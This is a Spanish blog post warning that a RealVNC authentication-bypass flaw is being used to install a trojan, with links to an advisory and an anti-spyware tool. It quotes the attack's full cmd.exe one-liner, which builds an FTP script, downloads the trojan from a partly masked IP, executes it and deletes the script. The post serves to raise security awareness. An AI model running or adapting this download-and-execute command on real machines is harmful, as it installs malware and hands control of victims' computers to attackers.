|
Todos somos conscientes que durante la navegación web se nos intentan instalar multitud de malware,spyware, adaware ... Ahora vamos a ver que la gente que realiza esto, no se conforma con esperar a que visitemos las páginas, también buscan vulnerabilidades para instalarnoslo directamente.
A mediados de mayo de este año se encontro un grave vulnerabilidad en RealVNC, para los que no lo sepan RealVNC nos permite manejar nuestro PC de forma remota de la misma forma que lo hariamos en local. El problema era que sin saber la contraseña de autenticación era posible conectarse al servidor y por lo tanto hacerse con el control del PC, es igual que si el tio entra en nuestra casa y se sienta delante del PC, en http://www.hispasec.com/unaaldia/2760
podéis encontrar toda la información. Despúes de un par de meses parece que esta vulnerabilidad se esta utilizando para instalar malware en los equipos, en concreto esta instalando el 84785_redworld[1].exe, un troyano capaz de hacer de todo, en: http://fileinfo.prevx.com/spyware/qqac2039335088-7823954856/ 84785_REDWORLD%5B1%5D.EXE.html tenéis información adicional. El procedimiento es una herramienta automática que detecta la vulnerabilidad del RealVNC se conecta a nuestro PC y ejecuta:
cmd.exe /c echo open 80.103.XX.XX 22998>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit Con esto lo que hace es bajarse a través del ftp el troyano y lo ejecuta en nuestra máquina, a partir de aqui nuestro PC puede ser usado por el atacante. Parece que además de esta vulnerabilidad del RealVNC podría utilizar otras vulnerabilidades de Windows. El problema como siempre es que es díficil saber si estamos infectados para eso hay que utilizar de forma habitual programas que eliminen spyware. Si queréis estar tranquilos podéis probar este programa que elimina este y muchos otros malware http://www.prevx.com/ Powered by AkoComment! |
